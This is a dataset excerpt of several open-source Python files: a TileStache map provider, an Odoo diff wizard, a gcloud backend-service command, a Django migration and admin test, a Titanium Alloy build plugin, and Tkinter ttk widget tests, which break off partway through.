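# provider is typically referenced through the class-based provider syntax; the layer name and
# file paths below are hypothetical.
#
#   {
#     "layers": {
#       "osm": {
#         "provider": {
#           "class": "TileStache.Goodies.Providers.Cascadenik:Provider",
#           "kwargs": {"mapfile": "style.mml", "workdir": "/tmp/cascadenik"}
#         }
#       }
#     }
#   }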
from tempfile import gettempdir
try:
from ...Mapnik import ImageProvider, mapnik
from cascadenik import load_map
except ImportError:
# can still build documentation
pass
class Provider (ImageProvider):
""" Renders map images from Cascadenik MML files.
Arguments:
- mapfile (required)
Local file path to Mapnik XML file.
- fonts (optional)
Local directory path to *.ttf font files.
- workdir (optional)
Directory path for working files, tempfile.gettempdir() by default.
"""
def __init__(self, layer, mapfile, fonts=None, workdir=None):
""" Initialize Cascadenik provider with layer and mapfile.
"""
self.workdir = workdir or gettempdir()
self.mapnik = None
ImageProvider.__init__(self, layer, mapfile, fonts)
def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom):
""" Mostly hand off functionality to Mapnik.ImageProvider.renderArea()
"""
if self.mapnik is None:
self.mapnik = mapnik.Map(0, 0)
load_map(self.mapnik, str(self.mapfile), self.workdir, cache_dir=self.workdir)
return ImageProvider.renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom)
| bsd-3-clause |
mustafat/odoo-1 | addons/website_blog/wizard/document_page_show_diff.py | 372 | 2184 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class showdiff(osv.osv_memory):
""" Disp[ay Difference for History """
_name = 'blog.post.history.show_diff'
def get_diff(self, cr, uid, context=None):
if context is None:
context = {}
history = self.pool.get('blog.post.history')
ids = context.get('active_ids', [])
diff = ""
if len(ids) == 2:
if ids[0] > ids[1]:
diff = history.getDiff(cr, uid, ids[1], ids[0])
else:
diff = history.getDiff(cr, uid, ids[0], ids[1])
elif len(ids) == 1:
old = history.browse(cr, uid, ids[0])
nids = history.search(cr, uid, [('post_id', '=', old.post_id.id)])
nids.sort()
diff = history.getDiff(cr, uid, ids[0], nids[-1])
else:
raise osv.except_osv(_('Warning!'), _('You need to select minimum one or maximum two history revisions!'))
return diff
_columns = {
'diff': fields.text('Diff', readonly=True),
}
_defaults = {
'diff': get_diff
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
harshilasu/GraphicMelon | y/google-cloud-sdk/lib/googlecloudsdk/compute/subcommands/backend_services/update.py | 4 | 2586 | # Copyright 2014 Google Inc. All Rights Reserved.
"""Command for updating backend services."""
import copy
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.compute.lib import backend_services_utils
from googlecloudsdk.compute.lib import base_classes
class Update(base_classes.ReadWriteCommand):
"""Update a backend service."""
@staticmethod
def Args(parser):
backend_services_utils.AddUpdatableArgs(
parser,
default_protocol=None,
default_timeout=None)
parser.add_argument(
'name',
help='The name of the backend service to update.')
@property
def service(self):
return self.compute.backendServices
@property
def resource_type(self):
return 'backendServices'
def CreateReference(self, args):
return self.CreateGlobalReference(args.name)
def GetGetRequest(self, args):
return (
self.service,
'Get',
self.messages.ComputeBackendServicesGetRequest(
project=self.project,
backendService=self.ref.Name()))
def GetSetRequest(self, args, replacement, _):
return (
self.service,
'Update',
self.messages.ComputeBackendServicesUpdateRequest(
project=self.project,
backendService=self.ref.Name(),
backendServiceResource=replacement))
def Modify(self, args, existing):
replacement = copy.deepcopy(existing)
if args.description:
replacement.description = args.description
elif args.description is not None:
replacement.description = None
health_checks = backend_services_utils.GetHealthChecks(args, self)
if health_checks:
replacement.healthChecks = health_checks
if args.timeout:
replacement.timeoutSec = args.timeout
if args.port:
replacement.port = args.port
if args.port_name:
replacement.portName = args.port_name
if args.protocol:
replacement.protocol = (self.messages.BackendService
.ProtocolValueValuesEnum(args.protocol))
return replacement
def Run(self, args):
if not any([
args.protocol,
args.description is not None,
args.http_health_checks,
args.timeout is not None,
args.port,
args.port_name,
]):
raise exceptions.ToolException('At least one property must be modified.')
return super(Update, self).Run(args)
Update.detailed_help = {
'brief': 'Update a backend service',
'DESCRIPTION': """
*{command}* is used to update backend services.
""",
}
| gpl-3.0 |
sergei-maertens/django | django/contrib/sites/migrations/0001_initial.py | 378 | 1134 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django.contrib.sites.models
from django.contrib.sites.models import _simple_domain_name_validator
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = []
operations = [
migrations.CreateModel(
name='Site',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('domain', models.CharField(
max_length=100, verbose_name='domain name', validators=[_simple_domain_name_validator]
)),
('name', models.CharField(max_length=50, verbose_name='display name')),
],
options={
'ordering': ('domain',),
'db_table': 'django_site',
'verbose_name': 'site',
'verbose_name_plural': 'sites',
},
bases=(models.Model,),
managers=[
('objects', django.contrib.sites.models.SiteManager()),
],
),
]
| bsd-3-clause |
koushikpillai/simplecalci | plugins/ti.alloy/plugin.py | 1729 | 5251 | import os, sys, subprocess, hashlib
import subprocess
def check_output(*popenargs, **kwargs):
r"""Run command with arguments and return its output as a byte string.
Backported from Python 2.7 as it's implemented as pure python on stdlib.
>>> check_output(['/usr/bin/python', '--version'])
Python 2.6.2
"""
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
error = subprocess.CalledProcessError(retcode, cmd)
error.output = output
raise error
return output
def compile(config):
paths = {}
binaries = ["alloy","node"]
dotAlloy = os.path.abspath(os.path.join(config['project_dir'], 'build', '.alloynewcli'))
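# build/.alloynewcli is apparently written by the newer Alloy CLI once it has already compiled the app; when the marker exists this legacy plugin only removes it and skips recompiling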
if os.path.exists(dotAlloy):
print "[DEBUG] build/.alloynewcli file found, skipping plugin..."
os.remove(dotAlloy)
else:
for binary in binaries:
try:
# see if the environment variable is defined
paths[binary] = os.environ["ALLOY_" + ("NODE_" if binary == "node" else "") + "PATH"]
except KeyError as ex:
# next try PATH, and then our guess paths
if sys.platform == "darwin" or sys.platform.startswith('linux'):
userPath = os.environ["HOME"]
guessPaths = [
"/usr/local/bin/"+binary,
"/opt/local/bin/"+binary,
userPath+"/local/bin/"+binary,
"/opt/bin/"+binary,
"/usr/bin/"+binary,
"/usr/local/share/npm/bin/"+binary
]
try:
binaryPath = check_output(["which",binary], stderr=subprocess.STDOUT).strip()
print "[DEBUG] %s installed at '%s'" % (binary,binaryPath)
except:
print "[WARN] Couldn't find %s on your PATH:" % binary
print "[WARN] %s" % os.environ["PATH"]
print "[WARN]"
print "[WARN] Checking for %s in a few default locations:" % binary
for p in guessPaths:
sys.stdout.write("[WARN] %s -> " % p)
if os.path.exists(p):
binaryPath = p
print "FOUND"
break
else:
print "not found"
binaryPath = None
if binaryPath is None:
print "[ERROR] Couldn't find %s" % binary
sys.exit(1)
else:
paths[binary] = binaryPath
# no guesses on windows, just use the PATH
elif sys.platform == "win32":
paths["alloy"] = "alloy.cmd"
f = os.path.abspath(os.path.join(config['project_dir'], 'app'))
if os.path.exists(f):
print "[INFO] alloy app found at %s" % f
rd = os.path.abspath(os.path.join(config['project_dir'], 'Resources'))
devicefamily = 'none'
simtype = 'none'
version = '0'
deploytype = 'development'
if config['platform']==u'ios':
version = config['iphone_version']
devicefamily = config['devicefamily']
deploytype = config['deploytype']
if config['platform']==u'android':
builder = config['android_builder']
version = builder.tool_api_level
deploytype = config['deploy_type']
if config['platform']==u'mobileweb':
builder = config['mobileweb_builder']
deploytype = config['deploytype']
cfg = "platform=%s,version=%s,simtype=%s,devicefamily=%s,deploytype=%s," % (config['platform'],version,simtype,devicefamily,deploytype)
if sys.platform == "win32":
cmd = [paths["alloy"], "compile", f, "--no-colors", "--config", cfg]
else:
cmd = [paths["node"], paths["alloy"], "compile", f, "--no-colors", "--config", cfg]
print "[INFO] Executing Alloy compile:"
print "[INFO] %s" % " ".join(cmd)
try:
print check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as ex:
if hasattr(ex, 'output'):
print ex.output
print "[ERROR] Alloy compile failed"
retcode = 1
if hasattr(ex, 'returncode'):
retcode = ex.returncode
sys.exit(retcode)
except EnvironmentError as ex:
print "[ERROR] Unexpected error with Alloy compiler plugin: %s" % ex.strerror
sys.exit(2)
| apache-2.0 |
avneesh91/django | tests/admin_views/test_multidb.py | 23 | 2467 | from unittest import mock
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.models import User
from django.db import connections
from django.test import TestCase, override_settings
from django.urls import reverse
from .models import Book
class Router:
target_db = None
def db_for_read(self, model, **hints):
return self.target_db
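# route writes to whichever database was selected for reads in the current test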
db_for_write = db_for_read
site = admin.AdminSite(name='test_adminsite')
site.register(Book)
urlpatterns = [
url(r'^admin/', site.urls),
]
@override_settings(ROOT_URLCONF=__name__, DATABASE_ROUTERS=['%s.Router' % __name__])
class MultiDatabaseTests(TestCase):
multi_db = True
@classmethod
def setUpTestData(cls):
cls.superusers = {}
cls.test_book_ids = {}
for db in connections:
Router.target_db = db
cls.superusers[db] = User.objects.create_superuser(
username='admin', password='something', email='[email protected]',
)
b = Book(name='Test Book')
b.save(using=db)
cls.test_book_ids[db] = b.id
@mock.patch('django.contrib.admin.options.transaction')
def test_add_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_add'),
{'name': 'Foobar: 5th edition'},
)
mock.atomic.assert_called_with(using=db)
@mock.patch('django.contrib.admin.options.transaction')
def test_change_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_change', args=[self.test_book_ids[db]]),
{'name': 'Test Book 2: Test more'},
)
mock.atomic.assert_called_with(using=db)
@mock.patch('django.contrib.admin.options.transaction')
def test_delete_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_delete', args=[self.test_book_ids[db]]),
{'post': 'yes'},
)
mock.atomic.assert_called_with(using=db)
| bsd-3-clause |
jlspyaozhongkai/Uter | third_party_backup/Python-2.7.9/Lib/lib-tk/test/test_ttk/test_widgets.py | 13 | 57843 | import unittest
import Tkinter as tkinter
from Tkinter import TclError
import ttk
from test.test_support import requires, run_unittest
import sys
from test_functions import MockTclObj
from support import (AbstractTkTest, tcl_version, get_tk_patchlevel,
simulate_mouse_click)
from widget_tests import (add_standard_options, noconv, noconv_meth,
AbstractWidgetTest, StandardOptionsTests,
IntegerSizeTests, PixelSizeTests,
setUpModule)
requires('gui')
class StandardTtkOptionsTests(StandardOptionsTests):
def test_class(self):
widget = self.create()
self.assertEqual(widget['class'], '')
errmsg='attempt to change read-only option'
if get_tk_patchlevel() < (8, 6, 0): # actually this was changed in 8.6b3
errmsg='Attempt to change read-only option'
self.checkInvalidParam(widget, 'class', 'Foo', errmsg=errmsg)
widget2 = self.create(class_='Foo')
self.assertEqual(widget2['class'], 'Foo')
def test_padding(self):
widget = self.create()
self.checkParam(widget, 'padding', 0, expected=('0',))
self.checkParam(widget, 'padding', 5, expected=('5',))
self.checkParam(widget, 'padding', (5, 6), expected=('5', '6'))
self.checkParam(widget, 'padding', (5, 6, 7),
expected=('5', '6', '7'))
self.checkParam(widget, 'padding', (5, 6, 7, 8),
expected=('5', '6', '7', '8'))
self.checkParam(widget, 'padding', ('5p', '6p', '7p', '8p'))
self.checkParam(widget, 'padding', (), expected='')
def test_style(self):
widget = self.create()
self.assertEqual(widget['style'], '')
errmsg = 'Layout Foo not found'
if hasattr(self, 'default_orient'):
errmsg = ('Layout %s.Foo not found' %
getattr(self, 'default_orient').title())
self.checkInvalidParam(widget, 'style', 'Foo',
errmsg=errmsg)
widget2 = self.create(class_='Foo')
self.assertEqual(widget2['class'], 'Foo')
# XXX
pass
class WidgetTest(AbstractTkTest, unittest.TestCase):
"""Tests methods available in every ttk widget."""
def setUp(self):
super(WidgetTest, self).setUp()
self.widget = ttk.Button(self.root, width=0, text="Text")
self.widget.pack()
self.widget.wait_visibility()
def test_identify(self):
self.widget.update_idletasks()
self.assertEqual(self.widget.identify(
self.widget.winfo_width() // 2,
self.widget.winfo_height() // 2
), "label")
self.assertEqual(self.widget.identify(-1, -1), "")
self.assertRaises(tkinter.TclError, self.widget.identify, None, 5)
self.assertRaises(tkinter.TclError, self.widget.identify, 5, None)
self.assertRaises(tkinter.TclError, self.widget.identify, 5, '')
def test_widget_state(self):
# XXX not sure about the portability of all these tests
self.assertEqual(self.widget.state(), ())
self.assertEqual(self.widget.instate(['!disabled']), True)
# changing from !disabled to disabled
self.assertEqual(self.widget.state(['disabled']), ('!disabled', ))
# no state change
self.assertEqual(self.widget.state(['disabled']), ())
# change back to !disabled but also active
self.assertEqual(self.widget.state(['!disabled', 'active']),
('!active', 'disabled'))
# no state changes, again
self.assertEqual(self.widget.state(['!disabled', 'active']), ())
self.assertEqual(self.widget.state(['active', '!disabled']), ())
def test_cb(arg1, **kw):
return arg1, kw
self.assertEqual(self.widget.instate(['!disabled'],
test_cb, "hi", **{"msg": "there"}),
('hi', {'msg': 'there'}))
# attempt to set invalid statespec
currstate = self.widget.state()
self.assertRaises(tkinter.TclError, self.widget.instate,
['badstate'])
self.assertRaises(tkinter.TclError, self.widget.instate,
['disabled', 'badstate'])
# verify that widget didn't change its state
self.assertEqual(currstate, self.widget.state())
# ensuring that passing None as state doesn't modify current state
self.widget.state(['active', '!disabled'])
self.assertEqual(self.widget.state(), ('active', ))
class AbstractToplevelTest(AbstractWidgetTest, PixelSizeTests):
_conv_pixels = noconv_meth
@add_standard_options(StandardTtkOptionsTests)
class FrameTest(AbstractToplevelTest, unittest.TestCase):
OPTIONS = (
'borderwidth', 'class', 'cursor', 'height',
'padding', 'relief', 'style', 'takefocus',
'width',
)
def create(self, **kwargs):
return ttk.Frame(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class LabelFrameTest(AbstractToplevelTest, unittest.TestCase):
OPTIONS = (
'borderwidth', 'class', 'cursor', 'height',
'labelanchor', 'labelwidget',
'padding', 'relief', 'style', 'takefocus',
'text', 'underline', 'width',
)
def create(self, **kwargs):
return ttk.LabelFrame(self.root, **kwargs)
def test_labelanchor(self):
widget = self.create()
self.checkEnumParam(widget, 'labelanchor',
'e', 'en', 'es', 'n', 'ne', 'nw', 's', 'se', 'sw', 'w', 'wn', 'ws',
errmsg='Bad label anchor specification {}')
self.checkInvalidParam(widget, 'labelanchor', 'center')
def test_labelwidget(self):
widget = self.create()
label = ttk.Label(self.root, text='Mupp', name='foo')
self.checkParam(widget, 'labelwidget', label, expected='.foo')
label.destroy()
class AbstractLabelTest(AbstractWidgetTest):
def checkImageParam(self, widget, name):
image = tkinter.PhotoImage(master=self.root, name='image1')
image2 = tkinter.PhotoImage(master=self.root, name='image2')
self.checkParam(widget, name, image, expected=('image1',))
self.checkParam(widget, name, 'image1', expected=('image1',))
self.checkParam(widget, name, (image,), expected=('image1',))
self.checkParam(widget, name, (image, 'active', image2),
expected=('image1', 'active', 'image2'))
self.checkParam(widget, name, 'image1 active image2',
expected=('image1', 'active', 'image2'))
self.checkInvalidParam(widget, name, 'spam',
errmsg='image "spam" doesn\'t exist')
def test_compound(self):
widget = self.create()
self.checkEnumParam(widget, 'compound',
'none', 'text', 'image', 'center',
'top', 'bottom', 'left', 'right')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state', 'active', 'disabled', 'normal')
def test_width(self):
widget = self.create()
self.checkParams(widget, 'width', 402, -402, 0)
@add_standard_options(StandardTtkOptionsTests)
class LabelTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'anchor', 'background',
'class', 'compound', 'cursor', 'font', 'foreground',
'image', 'justify', 'padding', 'relief', 'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'width', 'wraplength',
)
_conv_pixels = noconv_meth
def create(self, **kwargs):
return ttk.Label(self.root, **kwargs)
def test_font(self):
widget = self.create()
self.checkParam(widget, 'font',
'-Adobe-Helvetica-Medium-R-Normal--*-120-*-*-*-*-*-*')
@add_standard_options(StandardTtkOptionsTests)
class ButtonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor', 'default',
'image', 'state', 'style', 'takefocus', 'text', 'textvariable',
'underline', 'width',
)
def create(self, **kwargs):
return ttk.Button(self.root, **kwargs)
def test_default(self):
widget = self.create()
self.checkEnumParam(widget, 'default', 'normal', 'active', 'disabled')
def test_invoke(self):
success = []
btn = ttk.Button(self.root, command=lambda: success.append(1))
btn.invoke()
self.assertTrue(success)
@add_standard_options(StandardTtkOptionsTests)
class CheckbuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor',
'image',
'offvalue', 'onvalue',
'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'variable', 'width',
)
def create(self, **kwargs):
return ttk.Checkbutton(self.root, **kwargs)
def test_offvalue(self):
widget = self.create()
self.checkParams(widget, 'offvalue', 1, 2.3, '', 'any string')
def test_onvalue(self):
widget = self.create()
self.checkParams(widget, 'onvalue', 1, 2.3, '', 'any string')
def test_invoke(self):
success = []
def cb_test():
success.append(1)
return "cb test called"
cbtn = ttk.Checkbutton(self.root, command=cb_test)
# the variable automatically created by ttk.Checkbutton is actually
# undefined till we invoke the Checkbutton
self.assertEqual(cbtn.state(), ('alternate', ))
self.assertRaises(tkinter.TclError, cbtn.tk.globalgetvar,
cbtn['variable'])
res = cbtn.invoke()
self.assertEqual(res, "cb test called")
self.assertEqual(cbtn['onvalue'],
cbtn.tk.globalgetvar(cbtn['variable']))
self.assertTrue(success)
cbtn['command'] = ''
res = cbtn.invoke()
self.assertFalse(str(res))
self.assertLessEqual(len(success), 1)
self.assertEqual(cbtn['offvalue'],
cbtn.tk.globalgetvar(cbtn['variable']))
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class ComboboxTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'exportselection', 'height',
'justify', 'postcommand', 'state', 'style',
'takefocus', 'textvariable', 'values', 'width',
)
def setUp(self):
super(ComboboxTest, self).setUp()
self.combo = self.create()
def create(self, **kwargs):
return ttk.Combobox(self.root, **kwargs)
def test_height(self):
widget = self.create()
self.checkParams(widget, 'height', 100, 101.2, 102.6, -100, 0, '1i')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state', 'active', 'disabled', 'normal')
def _show_drop_down_listbox(self):
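# simulate a mouse press/release on the drop-down arrow near the right edge of the combobox so the popdown listbox is posted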
width = self.combo.winfo_width()
self.combo.event_generate('<ButtonPress-1>', x=width - 5, y=5)
self.combo.event_generate('<ButtonRelease-1>', x=width - 5, y=5)
self.combo.update_idletasks()
def test_virtual_event(self):
success = []
self.combo['values'] = [1]
self.combo.bind('<<ComboboxSelected>>',
lambda evt: success.append(True))
self.combo.pack()
self.combo.wait_visibility()
height = self.combo.winfo_height()
self._show_drop_down_listbox()
self.combo.update()
self.combo.event_generate('<Return>')
self.combo.update()
self.assertTrue(success)
def test_postcommand(self):
success = []
self.combo['postcommand'] = lambda: success.append(True)
self.combo.pack()
self.combo.wait_visibility()
self._show_drop_down_listbox()
self.assertTrue(success)
# testing postcommand removal
self.combo['postcommand'] = ''
self._show_drop_down_listbox()
self.assertEqual(len(success), 1)
def test_values(self):
def check_get_current(getval, currval):
self.assertEqual(self.combo.get(), getval)
self.assertEqual(self.combo.current(), currval)
self.assertEqual(self.combo['values'],
() if tcl_version < (8, 5) else '')
check_get_current('', -1)
self.checkParam(self.combo, 'values', 'mon tue wed thur',
expected=('mon', 'tue', 'wed', 'thur'))
self.checkParam(self.combo, 'values', ('mon', 'tue', 'wed', 'thur'))
self.checkParam(self.combo, 'values', (42, 3.14, '', 'any string'))
self.checkParam(self.combo, 'values', () if tcl_version < (8, 5) else '')
self.combo['values'] = ['a', 1, 'c']
self.combo.set('c')
check_get_current('c', 2)
self.combo.current(0)
check_get_current('a', 0)
self.combo.set('d')
check_get_current('d', -1)
# testing values with empty string
self.combo.set('')
self.combo['values'] = (1, 2, '', 3)
check_get_current('', 2)
# testing values with empty string set through configure
self.combo.configure(values=[1, '', 2])
self.assertEqual(self.combo['values'],
('1', '', '2') if self.wantobjects else
'1 {} 2')
# testing values with spaces
self.combo['values'] = ['a b', 'a\tb', 'a\nb']
self.assertEqual(self.combo['values'],
('a b', 'a\tb', 'a\nb') if self.wantobjects else
'{a b} {a\tb} {a\nb}')
# testing values with special characters
self.combo['values'] = [r'a\tb', '"a"', '} {']
self.assertEqual(self.combo['values'],
(r'a\tb', '"a"', '} {') if self.wantobjects else
r'a\\tb {"a"} \}\ \{')
# out of range
self.assertRaises(tkinter.TclError, self.combo.current,
len(self.combo['values']))
# it expects an integer (or something that can be converted to int)
self.assertRaises(tkinter.TclError, self.combo.current, '')
# testing creating combobox with empty string in values
combo2 = ttk.Combobox(self.root, values=[1, 2, ''])
self.assertEqual(combo2['values'],
('1', '2', '') if self.wantobjects else '1 2 {}')
combo2.destroy()
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class EntryTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'background', 'class', 'cursor',
'exportselection', 'font',
'invalidcommand', 'justify',
'show', 'state', 'style', 'takefocus', 'textvariable',
'validate', 'validatecommand', 'width', 'xscrollcommand',
)
def setUp(self):
super(EntryTest, self).setUp()
self.entry = self.create()
def create(self, **kwargs):
return ttk.Entry(self.root, **kwargs)
def test_invalidcommand(self):
widget = self.create()
self.checkCommandParam(widget, 'invalidcommand')
def test_show(self):
widget = self.create()
self.checkParam(widget, 'show', '*')
self.checkParam(widget, 'show', '')
self.checkParam(widget, 'show', ' ')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state',
'disabled', 'normal', 'readonly')
def test_validate(self):
widget = self.create()
self.checkEnumParam(widget, 'validate',
'all', 'key', 'focus', 'focusin', 'focusout', 'none')
def test_validatecommand(self):
widget = self.create()
self.checkCommandParam(widget, 'validatecommand')
def test_bbox(self):
self.assertIsBoundingBox(self.entry.bbox(0))
self.assertRaises(tkinter.TclError, self.entry.bbox, 'noindex')
self.assertRaises(tkinter.TclError, self.entry.bbox, None)
def test_identify(self):
self.entry.pack()
self.entry.wait_visibility()
self.entry.update_idletasks()
self.assertEqual(self.entry.identify(5, 5), "textarea")
self.assertEqual(self.entry.identify(-1, -1), "")
self.assertRaises(tkinter.TclError, self.entry.identify, None, 5)
self.assertRaises(tkinter.TclError, self.entry.identify, 5, None)
self.assertRaises(tkinter.TclError, self.entry.identify, 5, '')
def test_validation_options(self):
success = []
test_invalid = lambda: success.append(True)
self.entry['validate'] = 'none'
self.entry['validatecommand'] = lambda: False
self.entry['invalidcommand'] = test_invalid
self.entry.validate()
self.assertTrue(success)
self.entry['invalidcommand'] = ''
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['invalidcommand'] = test_invalid
self.entry['validatecommand'] = lambda: True
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['validatecommand'] = ''
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['validatecommand'] = True
self.assertRaises(tkinter.TclError, self.entry.validate)
def test_validation(self):
validation = []
def validate(to_insert):
if not 'a' <= to_insert.lower() <= 'z':
validation.append(False)
return False
validation.append(True)
return True
self.entry['validate'] = 'key'
self.entry['validatecommand'] = self.entry.register(validate), '%S'
self.entry.insert('end', 1)
self.entry.insert('end', 'a')
self.assertEqual(validation, [False, True])
self.assertEqual(self.entry.get(), 'a')
def test_revalidation(self):
def validate(content):
for letter in content:
if not 'a' <= letter.lower() <= 'z':
return False
return True
self.entry['validatecommand'] = self.entry.register(validate), '%P'
self.entry.insert('end', 'avocado')
self.assertEqual(self.entry.validate(), True)
self.assertEqual(self.entry.state(), ())
self.entry.delete(0, 'end')
self.assertEqual(self.entry.get(), '')
self.entry.insert('end', 'a1b')
self.assertEqual(self.entry.validate(), False)
self.assertEqual(self.entry.state(), ('invalid', ))
self.entry.delete(1)
self.assertEqual(self.entry.validate(), True)
self.assertEqual(self.entry.state(), ())
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class PanedWindowTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'height',
'orient', 'style', 'takefocus', 'width',
)
def setUp(self):
super(PanedWindowTest, self).setUp()
self.paned = self.create()
def create(self, **kwargs):
return ttk.PanedWindow(self.root, **kwargs)
def test_orient(self):
widget = self.create()
self.assertEqual(str(widget['orient']), 'vertical')
        errmsg = 'attempt to change read-only option'
        if get_tk_patchlevel() < (8, 6, 0):  # actually this was changed in 8.6b3
            errmsg = 'Attempt to change read-only option'
self.checkInvalidParam(widget, 'orient', 'horizontal',
errmsg=errmsg)
widget2 = self.create(orient='horizontal')
self.assertEqual(str(widget2['orient']), 'horizontal')
def test_add(self):
# attempt to add a child that is not a direct child of the paned window
label = ttk.Label(self.paned)
child = ttk.Label(label)
self.assertRaises(tkinter.TclError, self.paned.add, child)
label.destroy()
child.destroy()
# another attempt
label = ttk.Label(self.root)
child = ttk.Label(label)
self.assertRaises(tkinter.TclError, self.paned.add, child)
child.destroy()
label.destroy()
good_child = ttk.Label(self.root)
self.paned.add(good_child)
# re-adding a child is not accepted
self.assertRaises(tkinter.TclError, self.paned.add, good_child)
other_child = ttk.Label(self.paned)
self.paned.add(other_child)
self.assertEqual(self.paned.pane(0), self.paned.pane(1))
self.assertRaises(tkinter.TclError, self.paned.pane, 2)
good_child.destroy()
other_child.destroy()
self.assertRaises(tkinter.TclError, self.paned.pane, 0)
def test_forget(self):
self.assertRaises(tkinter.TclError, self.paned.forget, None)
self.assertRaises(tkinter.TclError, self.paned.forget, 0)
self.paned.add(ttk.Label(self.root))
self.paned.forget(0)
self.assertRaises(tkinter.TclError, self.paned.forget, 0)
def test_insert(self):
self.assertRaises(tkinter.TclError, self.paned.insert, None, 0)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, None)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, 0)
child = ttk.Label(self.root)
child2 = ttk.Label(self.root)
child3 = ttk.Label(self.root)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, child)
self.paned.insert('end', child2)
self.paned.insert(0, child)
self.assertEqual(self.paned.panes(), (str(child), str(child2)))
self.paned.insert(0, child2)
self.assertEqual(self.paned.panes(), (str(child2), str(child)))
self.paned.insert('end', child3)
self.assertEqual(self.paned.panes(),
(str(child2), str(child), str(child3)))
# reinserting a child should move it to its current position
panes = self.paned.panes()
self.paned.insert('end', child3)
self.assertEqual(panes, self.paned.panes())
# moving child3 to child2 position should result in child2 ending up
# in previous child position and child ending up in previous child3
# position
self.paned.insert(child2, child3)
self.assertEqual(self.paned.panes(),
(str(child3), str(child2), str(child)))
def test_pane(self):
self.assertRaises(tkinter.TclError, self.paned.pane, 0)
child = ttk.Label(self.root)
self.paned.add(child)
self.assertIsInstance(self.paned.pane(0), dict)
self.assertEqual(self.paned.pane(0, weight=None),
0 if self.wantobjects else '0')
# newer form for querying a single option
self.assertEqual(self.paned.pane(0, 'weight'),
0 if self.wantobjects else '0')
self.assertEqual(self.paned.pane(0), self.paned.pane(str(child)))
self.assertRaises(tkinter.TclError, self.paned.pane, 0,
badoption='somevalue')
def test_sashpos(self):
self.assertRaises(tkinter.TclError, self.paned.sashpos, None)
self.assertRaises(tkinter.TclError, self.paned.sashpos, '')
self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
child = ttk.Label(self.paned, text='a')
self.paned.add(child, weight=1)
self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
child2 = ttk.Label(self.paned, text='b')
self.paned.add(child2)
self.assertRaises(tkinter.TclError, self.paned.sashpos, 1)
self.paned.pack(expand=True, fill='both')
self.paned.wait_visibility()
curr_pos = self.paned.sashpos(0)
self.paned.sashpos(0, 1000)
self.assertNotEqual(curr_pos, self.paned.sashpos(0))
self.assertIsInstance(self.paned.sashpos(0), int)
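# Editor's note: an illustrative sketch, not part of the original test module.
# It mirrors the PanedWindow behaviour tested above: children must be added
# explicitly, and the optional `weight` controls how extra space is shared.
# The helper name and pane labels are assumptions for illustration.
def _sketch_build_paned_window(parent):
    paned = ttk.PanedWindow(parent, orient='horizontal')
    left = ttk.Label(parent, text='left')
    right = ttk.Label(parent, text='right')
    paned.add(left, weight=1)   # grows when the paned window grows
    paned.add(right, weight=0)  # keeps its requested size
    return paned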
@add_standard_options(StandardTtkOptionsTests)
class RadiobuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor',
'image',
'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'value', 'variable', 'width',
)
def create(self, **kwargs):
return ttk.Radiobutton(self.root, **kwargs)
def test_value(self):
widget = self.create()
self.checkParams(widget, 'value', 1, 2.3, '', 'any string')
def test_invoke(self):
success = []
def cb_test():
success.append(1)
return "cb test called"
myvar = tkinter.IntVar(self.root)
cbtn = ttk.Radiobutton(self.root, command=cb_test,
